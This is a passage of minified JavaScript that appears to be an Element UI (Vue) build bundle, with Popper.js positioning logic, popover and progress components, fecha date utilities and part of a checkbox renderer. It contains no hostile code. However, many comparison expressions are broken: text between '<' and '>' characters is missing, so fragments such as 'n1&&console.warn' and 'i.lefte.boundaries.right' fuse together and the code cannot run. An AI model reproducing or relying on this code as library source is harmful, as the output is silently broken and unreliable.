ion(e,t,i){"use strict";var n,s;"function"===typeof Symbol&&Symbol.iterator;(function(r,a){n=a,s="function"===typeof n?n.call(t,i,t,e):n,void 0===s||(e.exports=s)})(0,(function(){var e=window,t={placement:"bottom",gpuAcceleration:!0,offset:0,boundariesElement:"viewport",boundariesPadding:5,preventOverflowOrder:["left","right","top","bottom"],flipBehavior:"flip",arrowElement:"[x-arrow]",arrowOffset:0,modifiers:["shift","offset","preventOverflow","keepTogether","arrow","flip","applyStyle"],modifiersIgnored:[],forceAbsolute:!1};function i(e,i,n){this._reference=e.jquery?e[0]:e,this.state={};var s="undefined"===typeof i||null===i,r=i&&"[object Object]"===Object.prototype.toString.call(i);return this._popper=s||r?this.parse(r?i:{}):i.jquery?i[0]:i,this._options=Object.assign({},t,n),this._options.modifiers=this._options.modifiers.map(function(e){if(-1===this._options.modifiersIgnored.indexOf(e))return"applyStyle"===e&&this._popper.setAttribute("x-placement",this._options.placement),this.modifiers[e]||e}.bind(this)),this.state.position=this._getPosition(this._popper,this._reference),h(this._popper,{position:this.state.position,top:0}),this.update(),this._setupEventListeners(),this}function n(t){var i=t.style.display,n=t.style.visibility;t.style.display="block",t.style.visibility="hidden";t.offsetWidth;var s=e.getComputedStyle(t),r=parseFloat(s.marginTop)+parseFloat(s.marginBottom),a=parseFloat(s.marginLeft)+parseFloat(s.marginRight),o={width:t.offsetWidth+a,height:t.offsetHeight+r};return t.style.display=i,t.style.visibility=n,o}function s(e){var t={left:"right",right:"left",bottom:"top",top:"bottom"};return e.replace(/left|right|bottom|top/g,(function(e){return t[e]}))}function r(e){var t=Object.assign({},e);return t.right=t.left+t.width,t.bottom=t.top+t.height,t}function a(e,t){var i,n=0;for(i in e){if(e[i]===t)return n;n++}return null}function o(t,i){var n=e.getComputedStyle(t,null);return n[i]}function l(t){var i=t.offsetParent;return i!==e.document.body&&i?i:e.document.documentElement}function c(t){var i=t.parentNode;return i?i===e.document?e.document.body.scrollTop||e.document.body.scrollLeft?e.document.body:e.document.documentElement:-1!==["scroll","auto"].indexOf(o(i,"overflow"))||-1!==["scroll","auto"].indexOf(o(i,"overflow-x"))||-1!==["scroll","auto"].indexOf(o(i,"overflow-y"))?i:c(t.parentNode):t}function u(t){return t!==e.document.body&&("fixed"===o(t,"position")||(t.parentNode?u(t.parentNode):t))}function h(e,t){function i(e){return""!==e&&!isNaN(parseFloat(e))&&isFinite(e)}Object.keys(t).forEach((function(n){var s="";-1!==["width","height","top","right","bottom","left"].indexOf(n)&&i(t[n])&&(s="px"),e.style[n]=t[n]+s}))}function d(e){var t={};return e&&"[object Function]"===t.toString.call(e)}function p(e){var t={width:e.offsetWidth,height:e.offsetHeight,left:e.offsetLeft,top:e.offsetTop};return t.right=t.left+t.width,t.bottom=t.top+t.height,t}function f(e){var t=e.getBoundingClientRect(),i=-1!=navigator.userAgent.indexOf("MSIE"),n=i&&"HTML"===e.tagName?-e.scrollTop:t.top;return{left:t.left,top:n,right:t.right,bottom:t.bottom,width:t.right-t.left,height:t.bottom-n}}function m(e,t,i){var n=f(e),s=f(t);if(i){var r=c(t);s.top+=r.scrollTop,s.bottom+=r.scrollTop,s.left+=r.scrollLeft,s.right+=r.scrollLeft}var a={top:n.top-s.top,left:n.left-s.left,bottom:n.top-s.top+n.height,right:n.left-s.left+n.width,width:n.width,height:n.height};return a}function v(t){for(var i=["","ms","webkit","moz","o"],n=0;n1&&console.warn("WARNING: the given `parent` query("+t.parent+") matched more than one element, the first one will be used"),0===a.length)throw"ERROR: the given `parent` doesn't exists!";a=a[0]}return a.length>1&&a instanceof Element===!1&&(console.warn("WARNING: you have passed as parent a list of elements, the first one will be used"),a=a[0]),a.appendChild(s),s;function o(e,t){t.forEach((function(t){e.classList.add(t)}))}function l(e,t){t.forEach((function(t){e.setAttribute(t.split(":")[0],t.split(":")[1]||"")}))}},i.prototype._getPosition=function(e,t){var i=l(t);if(this._options.forceAbsolute)return"absolute";var n=u(t,i);return n?"fixed":"absolute"},i.prototype._getOffsets=function(e,t,i){i=i.split("-")[0];var s={};s.position=this.state.position;var r="fixed"===s.position,a=m(t,l(e),r),o=n(e);return-1!==["right","left"].indexOf(i)?(s.top=a.top+a.height/2-o.height/2,s.left="left"===i?a.left-o.width:a.right):(s.left=a.left+a.width/2-o.width/2,s.top="top"===i?a.top-o.height:a.bottom),s.width=o.width,s.height=o.height,{popper:s,reference:a}},i.prototype._setupEventListeners=function(){if(this.state.updateBound=this.update.bind(this),e.addEventListener("resize",this.state.updateBound),"window"!==this._options.boundariesElement){var t=c(this._reference);t!==e.document.body&&t!==e.document.documentElement||(t=e),t.addEventListener("scroll",this.state.updateBound),this.state.scrollTarget=t}},i.prototype._removeEventListeners=function(){e.removeEventListener("resize",this.state.updateBound),"window"!==this._options.boundariesElement&&this.state.scrollTarget&&(this.state.scrollTarget.removeEventListener("scroll",this.state.updateBound),this.state.scrollTarget=null),this.state.updateBound=null},i.prototype._getBoundaries=function(t,i,n){var s,r,a={};if("window"===n){var o=e.document.body,u=e.document.documentElement;r=Math.max(o.scrollHeight,o.offsetHeight,u.clientHeight,u.scrollHeight,u.offsetHeight),s=Math.max(o.scrollWidth,o.offsetWidth,u.clientWidth,u.scrollWidth,u.offsetWidth),a={top:0,right:s,bottom:r,left:0}}else if("viewport"===n){var h=l(this._popper),d=c(this._popper),f=p(h),m=function(e){return e==document.body?Math.max(document.documentElement.scrollTop,document.body.scrollTop):e.scrollTop},v=function(e){return e==document.body?Math.max(document.documentElement.scrollLeft,document.body.scrollLeft):e.scrollLeft},g="fixed"===t.offsets.popper.position?0:m(d),b="fixed"===t.offsets.popper.position?0:v(d);a={top:0-(f.top-g),right:e.document.documentElement.clientWidth-(f.left-b),bottom:e.document.documentElement.clientHeight-(f.top-g),left:0-(f.left-b)}}else a=l(this._popper)===n?{top:0,left:0,right:n.clientWidth,bottom:n.clientHeight}:p(n);return a.left+=i,a.right-=i,a.top=a.top+i,a.bottom=a.bottom-i,a},i.prototype.runModifiers=function(e,t,i){var n=t.slice();return void 0!==i&&(n=this._options.modifiers.slice(0,a(this._options.modifiers,i))),n.forEach(function(t){d(t)&&(e=t.call(this,e))}.bind(this)),e},i.prototype.isModifierRequired=function(e,t){var i=a(this._options.modifiers,e);return!!this._options.modifiers.slice(0,i).filter((function(e){return e===t})).length},i.prototype.modifiers={},i.prototype.modifiers.applyStyle=function(e){var t,i={position:e.offsets.popper.position},n=Math.round(e.offsets.popper.left),s=Math.round(e.offsets.popper.top);return this._options.gpuAcceleration&&(t=v("transform"))?(i[t]="translate3d("+n+"px, "+s+"px, 0)",i.top=0,i.left=0):(i.left=n,i.top=s),Object.assign(i,e.styles),h(this._popper,i),this._popper.setAttribute("x-placement",e.placement),this.isModifierRequired(this.modifiers.applyStyle,this.modifiers.arrow)&&e.offsets.arrow&&h(e.arrowElement,e.offsets.arrow),e},i.prototype.modifiers.shift=function(e){var t=e.placement,i=t.split("-")[0],n=t.split("-")[1];if(n){var s=e.offsets.reference,a=r(e.offsets.popper),o={y:{start:{top:s.top},end:{top:s.top+s.height-a.height}},x:{start:{left:s.left},end:{left:s.left+s.width-a.width}}},l=-1!==["bottom","top"].indexOf(i)?"x":"y";e.offsets.popper=Object.assign(a,o[l][n])}return e},i.prototype.modifiers.preventOverflow=function(e){var t=this._options.preventOverflowOrder,i=r(e.offsets.popper),n={left:function(){var t=i.left;return i.lefte.boundaries.right&&(t=Math.min(i.left,e.boundaries.right-i.width)),{left:t}},top:function(){var t=i.top;return i.tope.boundaries.bottom&&(t=Math.min(i.top,e.boundaries.bottom-i.height)),{top:t}}};return t.forEach((function(t){e.offsets.popper=Object.assign(i,n[t]())})),e},i.prototype.modifiers.keepTogether=function(e){var t=r(e.offsets.popper),i=e.offsets.reference,n=Math.floor;return t.rightn(i.right)&&(e.offsets.popper.left=n(i.right)),t.bottomn(i.bottom)&&(e.offsets.popper.top=n(i.bottom)),e},i.prototype.modifiers.flip=function(e){if(!this.isModifierRequired(this.modifiers.flip,this.modifiers.preventOverflow))return console.warn("WARNING: preventOverflow modifier is required by flip modifier in order to work, be sure to include it before flip!"),e;if(e.flipped&&e.placement===e._originalPlacement)return e;var t=e.placement.split("-")[0],i=s(t),n=e.placement.split("-")[1]||"",a=[];return a="flip"===this._options.flipBehavior?[t,i]:this._options.flipBehavior,a.forEach(function(o,l){if(t===o&&a.length!==l+1){t=e.placement.split("-")[0],i=s(t);var c=r(e.offsets.popper),u=-1!==["right","bottom"].indexOf(t);(u&&Math.floor(e.offsets.reference[t])>Math.floor(c[i])||!u&&Math.floor(e.offsets.reference[t])o[p]&&(e.offsets.popper[h]+=l[h]+f-o[p]);var m=l[h]+(i||l[u]/2-f/2),v=m-o[h];return v=Math.max(Math.min(o[u]-f-8,v),8),s[h]=v,s[d]="",e.offsets.arrow=s,e.arrowElement=t,e},Object.assign||Object.defineProperty(Object,"assign",{enumerable:!1,configurable:!0,writable:!0,value:function(e){if(void 0===e||null===e)throw new TypeError("Cannot convert first argument to object");for(var t=Object(e),i=1;i-1}},openDelay:{type:Number,default:0},closeDelay:{type:Number,default:200},title:String,disabled:Boolean,content:String,reference:{},popperClass:String,width:{},visibleArrow:{default:!0},arrowOffset:{type:Number,default:0},transition:{type:String,default:"fade-in-linear"},tabindex:{type:Number,default:0}},computed:{tooltipId:function(){return"el-popover-"+Object(l["generateId"])()}},watch:{showPopper:function(e){this.disabled||(e?this.$emit("show"):this.$emit("hide"))}},mounted:function(){var e=this,t=this.referenceElm=this.reference||this.$refs.reference,i=this.popper||this.$refs.popper;!t&&this.$refs.wrapper.children&&(t=this.referenceElm=this.$refs.wrapper.children[0]),t&&(Object(o["addClass"])(t,"el-popover__reference"),t.setAttribute("aria-describedby",this.tooltipId),t.setAttribute("tabindex",this.tabindex),i.setAttribute("tabindex",0),"click"!==this.trigger&&(Object(o["on"])(t,"focusin",(function(){e.handleFocus();var i=t.__vue__;i&&"function"===typeof i.focus&&i.focus()})),Object(o["on"])(i,"focusin",this.handleFocus),Object(o["on"])(t,"focusout",this.handleBlur),Object(o["on"])(i,"focusout",this.handleBlur)),Object(o["on"])(t,"keydown",this.handleKeydown),Object(o["on"])(t,"click",this.handleClick)),"click"===this.trigger?(Object(o["on"])(t,"click",this.doToggle),Object(o["on"])(document,"click",this.handleDocumentClick)):"hover"===this.trigger?(Object(o["on"])(t,"mouseenter",this.handleMouseEnter),Object(o["on"])(i,"mouseenter",this.handleMouseEnter),Object(o["on"])(t,"mouseleave",this.handleMouseLeave),Object(o["on"])(i,"mouseleave",this.handleMouseLeave)):"focus"===this.trigger&&(this.tabindex<0&&console.warn("[Element Warn][Popover]a negative taindex means that the element cannot be focused by tab key"),t.querySelector("input, textarea")?(Object(o["on"])(t,"focusin",this.doShow),Object(o["on"])(t,"focusout",this.doClose)):(Object(o["on"])(t,"mousedown",this.doShow),Object(o["on"])(t,"mouseup",this.doClose)))},beforeDestroy:function(){this.cleanup()},deactivated:function(){this.cleanup()},methods:{doToggle:function(){this.showPopper=!this.showPopper},doShow:function(){this.showPopper=!0},doClose:function(){this.showPopper=!1},handleFocus:function(){Object(o["addClass"])(this.referenceElm,"focusing"),"click"!==this.trigger&&"focus"!==this.trigger||(this.showPopper=!0)},handleClick:function(){Object(o["removeClass"])(this.referenceElm,"focusing")},handleBlur:function(){Object(o["removeClass"])(this.referenceElm,"focusing"),"click"!==this.trigger&&"focus"!==this.trigger||(this.showPopper=!1)},handleMouseEnter:function(){var e=this;clearTimeout(this._timer),this.openDelay?this._timer=setTimeout((function(){e.showPopper=!0}),this.openDelay):this.showPopper=!0},handleKeydown:function(e){27===e.keyCode&&"manual"!==this.trigger&&this.doClose()},handleMouseLeave:function(){var e=this;clearTimeout(this._timer),this.closeDelay?this._timer=setTimeout((function(){e.showPopper=!1}),this.closeDelay):this.showPopper=!1},handleDocumentClick:function(e){var t=this.reference||this.$refs.reference,i=this.popper||this.$refs.popper;!t&&this.$refs.wrapper.children&&(t=this.referenceElm=this.$refs.wrapper.children[0]),this.$el&&t&&!this.$el.contains(e.target)&&!t.contains(e.target)&&i&&!i.contains(e.target)&&(this.showPopper=!1)},handleAfterEnter:function(){this.$emit("after-enter")},handleAfterLeave:function(){this.$emit("after-leave"),this.doDestroy()},cleanup:function(){(this.openDelay||this.closeDelay)&&clearTimeout(this._timer)}},destroyed:function(){var e=this.reference;Object(o["off"])(e,"click",this.doToggle),Object(o["off"])(e,"mouseup",this.doClose),Object(o["off"])(e,"mousedown",this.doShow),Object(o["off"])(e,"focusin",this.doShow),Object(o["off"])(e,"focusout",this.doClose),Object(o["off"])(e,"mousedown",this.doShow),Object(o["off"])(e,"mouseup",this.doClose),Object(o["off"])(e,"mouseleave",this.handleMouseLeave),Object(o["off"])(e,"mouseenter",this.handleMouseEnter),Object(o["off"])(document,"click",this.handleDocumentClick)}},u=c,h=i(0),d=Object(h["a"])(u,n,s,!1,null,null,null);d.options.__file="packages/popover/src/main.vue";var p=d.exports,f=function(e,t,i){var n=t.expression?t.value:t.arg,s=i.context.$refs[n];s&&(Array.isArray(s)?s[0].$refs.reference=e:s.$refs.reference=e)},m={bind:function(e,t,i){f(e,t,i)},inserted:function(e,t,i){f(e,t,i)}},v=i(7),g=i.n(v);g.a.directive("popover",m),p.install=function(e){e.directive("popover",m),e.component(p.name,p)},p.directive=m;t["default"]=p}})},"6b7c":function(e,t,i){"use strict";t.__esModule=!0;var n=i("4897");t.default={methods:{t:function(){for(var e=arguments.length,t=Array(e),i=0;i0&&void 0!==arguments[0]?arguments[0]:"";return String(e).replace(/[|\\{}()[\]^$+*?.]/g,"\\$&")};var f=t.arrayFindIndex=function(e,t){for(var i=0;i!==e.length;++i)if(t(e[i]))return i;return-1},m=(t.arrayFind=function(e,t){var i=f(e,t);return-1!==i?e[i]:void 0},t.coerceTruthyValueToArray=function(e){return Array.isArray(e)?e:e?[e]:[]},t.isIE=function(){return!r.default.prototype.$isServer&&!isNaN(Number(document.documentMode))},t.isEdge=function(){return!r.default.prototype.$isServer&&navigator.userAgent.indexOf("Edge")>-1},t.isFirefox=function(){return!r.default.prototype.$isServer&&!!window.navigator.userAgent.match(/firefox/i)},t.autoprefixer=function(e){if("object"!==("undefined"===typeof e?"undefined":n(e)))return e;var t=["transform","transition","animation"],i=["ms-","webkit-"];return t.forEach((function(t){var n=e[t];t&&n&&i.forEach((function(i){e[i+t]=n}))})),e},t.kebabCase=function(e){var t=/([^-])([A-Z])/g;return e.replace(t,"$1-$2").replace(t,"$1-$2").toLowerCase()},t.capitalize=function(e){return(0,a.isString)(e)?e.charAt(0).toUpperCase()+e.slice(1):e},t.looseEqual=function(e,t){var i=(0,a.isObject)(e),n=(0,a.isObject)(t);return i&&n?JSON.stringify(e)===JSON.stringify(t):!i&&!n&&String(e)===String(t)}),v=t.arrayEquals=function(e,t){if(e=e||[],t=t||[],e.length!==t.length)return!1;for(var i=0;i1?t-1:0),a=1;a-1}},percentage:{type:Number,default:0,required:!0,validator:function(e){return e>=0&&e<=100}},status:{type:String,validator:function(e){return["success","exception","warning"].indexOf(e)>-1}},strokeWidth:{type:Number,default:6},strokeLinecap:{type:String,default:"round"},textInside:{type:Boolean,default:!1},width:{type:Number,default:126},showText:{type:Boolean,default:!0},color:{type:[String,Array,Function],default:""},format:Function},computed:{barStyle:function(){var e={};return e.width=this.percentage+"%",e.backgroundColor=this.getCurrentColor(this.percentage),e},relativeStrokeWidth:function(){return(this.strokeWidth/this.width*100).toFixed(1)},radius:function(){return"circle"===this.type||"dashboard"===this.type?parseInt(50-parseFloat(this.relativeStrokeWidth)/2,10):0},trackPath:function(){var e=this.radius,t="dashboard"===this.type;return"\n M 50 50\n m 0 "+(t?"":"-")+e+"\n a "+e+" "+e+" 0 1 1 0 "+(t?"-":"")+2*e+"\n a "+e+" "+e+" 0 1 1 0 "+(t?"":"-")+2*e+"\n "},perimeter:function(){return 2*Math.PI*this.radius},rate:function(){return"dashboard"===this.type?.75:1},strokeDashoffset:function(){var e=-1*this.perimeter*(1-this.rate)/2;return e+"px"},trailPathStyle:function(){return{strokeDasharray:this.perimeter*this.rate+"px, "+this.perimeter+"px",strokeDashoffset:this.strokeDashoffset}},circlePathStyle:function(){return{strokeDasharray:this.perimeter*this.rate*(this.percentage/100)+"px, "+this.perimeter+"px",strokeDashoffset:this.strokeDashoffset,transition:"stroke-dasharray 0.6s ease 0s, stroke 0.6s ease"}},stroke:function(){var e=void 0;if(this.color)e=this.getCurrentColor(this.percentage);else switch(this.status){case"success":e="#13ce66";break;case"exception":e="#ff4949";break;case"warning":e="#e6a23c";break;default:e="#20a0ff"}return e},iconClass:function(){return"warning"===this.status?"el-icon-warning":"line"===this.type?"success"===this.status?"el-icon-circle-check":"el-icon-circle-close":"success"===this.status?"el-icon-check":"el-icon-close"},progressTextSize:function(){return"line"===this.type?12+.4*this.strokeWidth:.111111*this.width+2},content:function(){return"function"===typeof this.format?this.format(this.percentage)||"":this.percentage+"%"}},methods:{getCurrentColor:function(e){return"function"===typeof this.color?this.color(e):"string"===typeof this.color?this.color:this.getLevelColor(e)},getLevelColor:function(e){for(var t=this.getColorArray().sort((function(e,t){return e.percentage-t.percentage})),i=0;ie)return t[i].color;return t[t.length-1].color},getColorArray:function(){var e=this.color,t=100/e.length;return e.map((function(e,i){return"string"===typeof e?{color:e,percentage:(i+1)*t}:e}))}}},a=r,o=i(0),l=Object(o["a"])(a,n,s,!1,null,null,null);l.options.__file="packages/progress/src/progress.vue";var c=l.exports;c.install=function(e){e.component(c.name,c)};t["default"]=c}})},c56a:function(e,t,i){"use strict";t.__esModule=!0,t.default=function(e,t){var i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:300,n=arguments.length>3&&void 0!==arguments[3]&&arguments[3];if(!e||!t)throw new Error("instance & callback is required");var s=!1,r=function(){s||(s=!0,t&&t.apply(null,arguments))};n?e.$once("after-leave",r):e.$on("after-leave",r),setTimeout((function(){r()}),i+100)}},d010:function(e,t,i){"use strict";function n(e,t,i){this.$children.forEach((function(s){var r=s.$options.componentName;r===e?s.$emit.apply(s,[t].concat(i)):n.apply(s,[e,t].concat([i]))}))}t.__esModule=!0,t.default={methods:{dispatch:function(e,t,i){var n=this.$parent||this.$root,s=n.$options.componentName;while(n&&(!s||s!==e))n=n.$parent,n&&(s=n.$options.componentName);n&&n.$emit.apply(n,[t].concat(i))},broadcast:function(e,t,i){n.call(this,e,t,i)}}}},d397:function(e,t,i){"use strict";function n(e){return void 0!==e&&null!==e}function s(e){var t=/([(\uAC00-\uD7AF)|(\u3130-\u318F)])+/gi;return t.test(e)}t.__esModule=!0,t.isDef=n,t.isKorean=s},d7d1:function(e,t,i){"use strict";var n;(function(s){var r={},a=/d{1,4}|M{1,4}|yy(?:yy)?|S{1,3}|Do|ZZ|([HhMsDm])\1?|[aA]|"[^"]*"|'[^']*'/g,o="\\d\\d?",l="\\d{3}",c="\\d{4}",u="[^\\s]+",h=/\[([^]*?)\]/gm,d=function(){};function p(e){return e.replace(/[|\\{()[^$+*?.-]/g,"\\$&")}function f(e,t){for(var i=[],n=0,s=e.length;n3?0:(e-e%10!==10)*e%10]}};var x={D:function(e){return e.getDay()},DD:function(e){return v(e.getDay())},Do:function(e,t){return t.DoFn(e.getDate())},d:function(e){return e.getDate()},dd:function(e){return v(e.getDate())},ddd:function(e,t){return t.dayNamesShort[e.getDay()]},dddd:function(e,t){return t.dayNames[e.getDay()]},M:function(e){return e.getMonth()+1},MM:function(e){return v(e.getMonth()+1)},MMM:function(e,t){return t.monthNamesShort[e.getMonth()]},MMMM:function(e,t){return t.monthNames[e.getMonth()]},yy:function(e){return v(String(e.getFullYear()),4).substr(2)},yyyy:function(e){return v(e.getFullYear(),4)},h:function(e){return e.getHours()%12||12},hh:function(e){return v(e.getHours()%12||12)},H:function(e){return e.getHours()},HH:function(e){return v(e.getHours())},m:function(e){return e.getMinutes()},mm:function(e){return v(e.getMinutes())},s:function(e){return e.getSeconds()},ss:function(e){return v(e.getSeconds())},S:function(e){return Math.round(e.getMilliseconds()/100)},SS:function(e){return v(Math.round(e.getMilliseconds()/10),2)},SSS:function(e){return v(e.getMilliseconds(),3)},a:function(e,t){return e.getHours()<12?t.amPm[0]:t.amPm[1]},A:function(e,t){return e.getHours()<12?t.amPm[0].toUpperCase():t.amPm[1].toUpperCase()},ZZ:function(e){var t=e.getTimezoneOffset();return(t>0?"-":"+")+v(100*Math.floor(Math.abs(t)/60)+Math.abs(t)%60,4)}},C={d:[o,function(e,t){e.day=t}],Do:[o+u,function(e,t){e.day=parseInt(t,10)}],M:[o,function(e,t){e.month=t-1}],yy:[o,function(e,t){var i=new Date,n=+(""+i.getFullYear()).substr(0,2);e.year=""+(t>68?n-1:n)+t}],h:[o,function(e,t){e.hour=t}],m:[o,function(e,t){e.minute=t}],s:[o,function(e,t){e.second=t}],yyyy:[c,function(e,t){e.year=t}],S:["\\d",function(e,t){e.millisecond=100*t}],SS:["\\d{2}",function(e,t){e.millisecond=10*t}],SSS:[l,function(e,t){e.millisecond=t}],D:[o,d],ddd:[u,d],MMM:[u,m("monthNamesShort")],MMMM:[u,m("monthNames")],a:[u,function(e,t,i){var n=t.toLowerCase();n===i.amPm[0]?e.isPm=!1:n===i.amPm[1]&&(e.isPm=!0)}],ZZ:["[^\\s]*?[\\+\\-]\\d\\d:?\\d\\d|[^\\s]*?Z",function(e,t){var i,n=(t+"").match(/([+-]|\d\d)/gi);n&&(i=60*n[1]+parseInt(n[2],10),e.timezoneOffset="+"===n[0]?i:-i)}]};C.dd=C.d,C.dddd=C.ddd,C.DD=C.D,C.mm=C.m,C.hh=C.H=C.HH=C.h,C.MM=C.M,C.ss=C.s,C.A=C.a,r.masks={default:"ddd MMM dd yyyy HH:mm:ss",shortDate:"M/D/yy",mediumDate:"MMM d, yyyy",longDate:"MMMM d, yyyy",fullDate:"dddd, MMMM d, yyyy",shortTime:"HH:mm",mediumTime:"HH:mm:ss",longTime:"HH:mm:ss.SSS"},r.format=function(e,t,i){var n=i||r.i18n;if("number"===typeof e&&(e=new Date(e)),"[object Date]"!==Object.prototype.toString.call(e)||isNaN(e.getTime()))throw new Error("Invalid Date in fecha.format");t=r.masks[t]||t||r.masks["default"];var s=[];return t=t.replace(h,(function(e,t){return s.push(t),"@@@"})),t=t.replace(a,(function(t){return t in x?x[t](e,n):t.slice(1,t.length-1)})),t.replace(/@@@/g,(function(){return s.shift()}))},r.parse=function(e,t,i){var n=i||r.i18n;if("string"!==typeof t)throw new Error("Invalid format in fecha.parse");if(t=r.masks[t]||t,e.length>1e3)return null;var s={},o=[],l=[];t=t.replace(h,(function(e,t){return l.push(t),"@@@"}));var c=p(t).replace(a,(function(e){if(C[e]){var t=C[e];return o.push(t[1]),"("+t[0]+")"}return e}));c=c.replace(/@@@/g,(function(){return l.shift()}));var u=e.match(new RegExp(c,"i"));if(!u)return null;for(var d=1;d1&&void 0!==arguments[1]?arguments[1]:1;return new Date(e.getFullYear(),e.getMonth(),e.getDate()-t)});t.nextDate=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1;return new Date(e.getFullYear(),e.getMonth(),e.getDate()+t)},t.getStartDateOfMonth=function(e,t){var i=new Date(e,t,1),n=i.getDay();return m(i,0===n?7:n)},t.getWeekNumber=function(e){if(!d(e))return null;var t=new Date(e.getTime());t.setHours(0,0,0,0),t.setDate(t.getDate()+3-(t.getDay()+6)%7);var i=new Date(t.getFullYear(),0,4);return 1+Math.round(((t.getTime()-i.getTime())/864e5-3+(i.getDay()+6)%7)/7)},t.getRangeHours=function(e){var t=[],i=[];if((e||[]).forEach((function(e){var t=e.map((function(e){return e.getHours()}));i=i.concat(c(t[0],t[1]))})),i.length)for(var n=0;n<24;n++)t[n]=-1===i.indexOf(n);else for(var s=0;s<24;s++)t[s]=!1;return t},t.getPrevMonthLastDays=function(e,t){if(t<=0)return[];var i=new Date(e.getTime());i.setDate(0);var n=i.getDate();return g(t).map((function(e,i){return n-(t-i-1)}))},t.getMonthDays=function(e){var t=new Date(e.getFullYear(),e.getMonth()+1,0),i=t.getDate();return g(i).map((function(e,t){return t+1}))};function v(e,t,i,n){for(var s=t;s0?e.forEach((function(e){var n=e[0],s=e[1],r=n.getHours(),a=n.getMinutes(),o=s.getHours(),l=s.getMinutes();r===t&&o!==t?v(i,a,60,!0):r===t&&o===t?v(i,a,l+1,!0):r!==t&&o===t?v(i,0,l+1,!0):rt&&v(i,0,60,!0)})):v(i,0,60,!0),i};var g=t.range=function(e){return Array.apply(null,{length:e}).map((function(e,t){return t}))},b=t.modifyDate=function(e,t,i,n){return new Date(t,i,n,e.getHours(),e.getMinutes(),e.getSeconds(),e.getMilliseconds())},y=t.modifyTime=function(e,t,i,n){return new Date(e.getFullYear(),e.getMonth(),e.getDate(),t,i,n,e.getMilliseconds())},_=(t.modifyWithTimeString=function(e,t){return null!=e&&t?(t=p(t,"HH:mm:ss"),y(e,t.getHours(),t.getMinutes(),t.getSeconds())):e},t.clearTime=function(e){return new Date(e.getFullYear(),e.getMonth(),e.getDate())},t.clearMilliseconds=function(e){return new Date(e.getFullYear(),e.getMonth(),e.getDate(),e.getHours(),e.getMinutes(),e.getSeconds(),0)},t.limitTimeRange=function(e,t){var i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:"HH:mm:ss";if(0===t.length)return e;var n=function(e){return s.default.parse(s.default.format(e,i),i)},r=n(e),a=t.map((function(e){return e.map(n)}));if(a.some((function(e){return r>=e[0]&&r<=e[1]})))return e;var o=a[0][0],l=a[0][0];a.forEach((function(e){o=new Date(Math.min(e[0],o)),l=new Date(Math.max(e[1],o))}));var c=r1&&void 0!==arguments[1]?arguments[1]:1,i=e.getFullYear(),n=e.getMonth();return x(e,i-t,n)},t.nextYear=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1,i=e.getFullYear(),n=e.getMonth();return x(e,i+t,n)},t.extractDateFormat=function(e){return e.replace(/\W?m{1,2}|\W?ZZ/g,"").replace(/\W?h{1,2}|\W?s{1,3}|\W?a/gi,"").trim()},t.extractTimeFormat=function(e){return e.replace(/\W?D{1,2}|\W?Do|\W?d{1,4}|\W?M{1,4}|\W?y{2,4}/g,"").trim()},t.validateRangeInOneMonth=function(e,t){return e.getMonth()===t.getMonth()&&e.getFullYear()===t.getFullYear()}},dcdc:function(e,t,i){e.exports=function(e){var t={};function i(n){if(t[n])return t[n].exports;var s=t[n]={i:n,l:!1,exports:{}};return e[n].call(s.exports,s,s.exports,i),s.l=!0,s.exports}return i.m=e,i.c=t,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},i.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,t){if(1&t&&(e=i(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var s in e)i.d(n,s,function(t){return e[t]}.bind(null,s));return n},i.n=function(e){var t=e&&e.__esModule?function(){return e["default"]}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="/dist/",i(i.s=90)}({0:function(e,t,i){"use strict";function n(e,t,i,n,s,r,a,o){var l,c="function"===typeof e?e.options:e;if(t&&(c.render=t,c.staticRenderFns=i,c._compiled=!0),n&&(c.functional=!0),r&&(c._scopeId="data-v-"+r),a?(l=function(e){e=e||this.$vnode&&this.$vnode.ssrContext||this.parent&&this.parent.$vnode&&this.parent.$vnode.ssrContext,e||"undefined"===typeof __VUE_SSR_CONTEXT__||(e=__VUE_SSR_CONTEXT__),s&&s.call(this,e),e&&e._registeredComponents&&e._registeredComponents.add(a)},c._ssrRegister=l):s&&(l=o?function(){s.call(this,this.$root.$options.shadowRoot)}:s),l)if(c.functional){c._injectStyles=l;var u=c.render;c.render=function(e,t){return l.call(t),u(e,t)}}else{var h=c.beforeCreate;c.beforeCreate=h?[].concat(h,l):[l]}return{exports:e,options:c}}i.d(t,"a",(function(){return n}))},4:function(e,t){e.exports=i("d010")},90:function(e,t,i){"use strict";i.r(t);var n=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("label",{staticClass:"el-checkbox",class:[e.border&&e.checkboxSize?"el-checkbox--"+e.checkboxSize:"",{"is-disabled":e.isDisabled},{"is-bordered":e.border},{"is-checked":e.isChecked}],attrs:{id:e.id}},[i("span",{staticClass:"el-checkbox__input",class:{"is-disabled":e.isDisabled,"is-checked":e.isChecked,"is-indeterminate":e.indeterminate,"is-focus":e.focus},attrs:{tabindex:!!e.indeterminate&&0,role:!!e.indeterminate&&"checkbox","aria-checked":!!e.indeterminate&&"mixed"}},[i("span",{staticClass:"el-checkbox__inner"}),e.trueLabel||e.falseLabel?i("input",{directives:[{name:"model",rawName:"v-model",value:e.model,expression:"model"}],staticClass:"el-checkbox__original",attrs:{type:"checkbox","aria-hidden":e.indeterminate?"true":"false",name:e.name,disabled:e.isDisabled,"true-value":e.trueLabel,"false-value":e.falseLabel},domProps:{checked:Array.isArray(e.model)?e._i(e.model,null)>-1:e._q(e.model,e.trueLabel)},on:{change:[function(t){var i=e.model,n=t.target,s=n.checked?e.trueLabel:e.falseLabel;if(Array.isArray(i)){var r=null,a=e._i(i,r);n.checked?a<0&&(e.model=i.concat([r])):a>-1&&(e.model=i.slice(0,a).concat(i.slice(a+1)))}else 